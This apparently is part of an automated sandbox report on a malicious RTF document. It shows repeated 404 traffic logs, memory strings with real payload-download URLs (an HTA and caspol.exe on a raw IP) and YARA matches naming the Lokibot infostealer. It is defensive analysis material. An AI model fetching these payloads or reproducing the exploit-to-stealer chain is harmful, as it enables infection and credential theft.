                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:08 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:15 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:17 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:27 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:29 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:43 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:55 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:09:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:10:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:10:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:10:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:10:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:10:04 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:10:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 10:10:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: powershell.exe, 00000006.00000002.387368019.0000000002831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.231/33/caspol.eln
                Source: powershell.exe, 00000006.00000002.387368019.0000000002831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.231/33/caspol.exe
                Source: powershell.exe, 00000006.00000002.387368019.0000000002831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.231/33/caspol.exe(sU
                Source: powershell.exe, 00000006.00000002.387189760.00000000005D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.231/33/caspol.exeb
                Source: EQNEDT32.EXE, 00000002.00000002.359766415.000000000056F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.hta
                Source: EQNEDT32.EXE, 00000002.00000002.359766415.000000000056F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.htaV
                Source: EQNEDT32.EXE, 00000002.00000002.359766415.000000000056F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.htaal
                Source: EQNEDT32.EXE, 00000002.00000002.360002424.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.231/xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.htaj
                Source: powershell.exe, 00000006.00000002.387368019.0000000002831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                Source: powershell.exe, 00000006.00000002.391849069.0000000003139000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000006.00000002.387368019.0000000002111000.00000004.00000800.00020000.00000000.sdmp, wininit.exe, 0000000D.00000002.392918350.00000000028DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: wininit.exe, wininit.exe, 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: powershell.exe, 00000006.00000002.391849069.0000000003139000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000006.00000002.391849069.0000000003139000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000006.00000002.391849069.0000000003139000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000006.00000002.391849069.0000000003139000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: C:\Windows\SysWOW64\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                System Summary

                barindex
                Source: stthigns.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                Source: 13.2.wininit.exe.3a0edc0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 13.2.wininit.exe.3a0edc0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 13.2.wininit.exe.3a0edc0.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 13.2.wininit.exe.3a0edc0.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 13.2.wininit.exe.3a0edc0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 13.2.wininit.exe.3a28de0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 13.2.wininit.exe.3a28de0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 13.2.wininit.exe.3a28de0.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 13.2.wininit.exe.3a28de0.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 13.2.wininit.exe.3a28de0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 15.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 15.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 15.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 15.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 15.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 13.2.wininit.exe.3a0edc0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 13.2.wininit.exe.3a0edc0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 13.2.wininit.exe.3a0edc0.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 13.2.wininit.exe.3a0edc0.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 15.2.wininit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 15.2.wininit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 15.2.wininit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 15.2.wininit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 15.2.wininit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 13.2.wininit.exe.3a28de0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 13.2.wininit.exe.3a28de0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 13.2.wininit.exe.3a28de0.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 13.2.wininit.exe.3a28de0.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000D.00000002.392918350.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0000000D.00000002.392918350.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0000000D.00000002.392918350.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
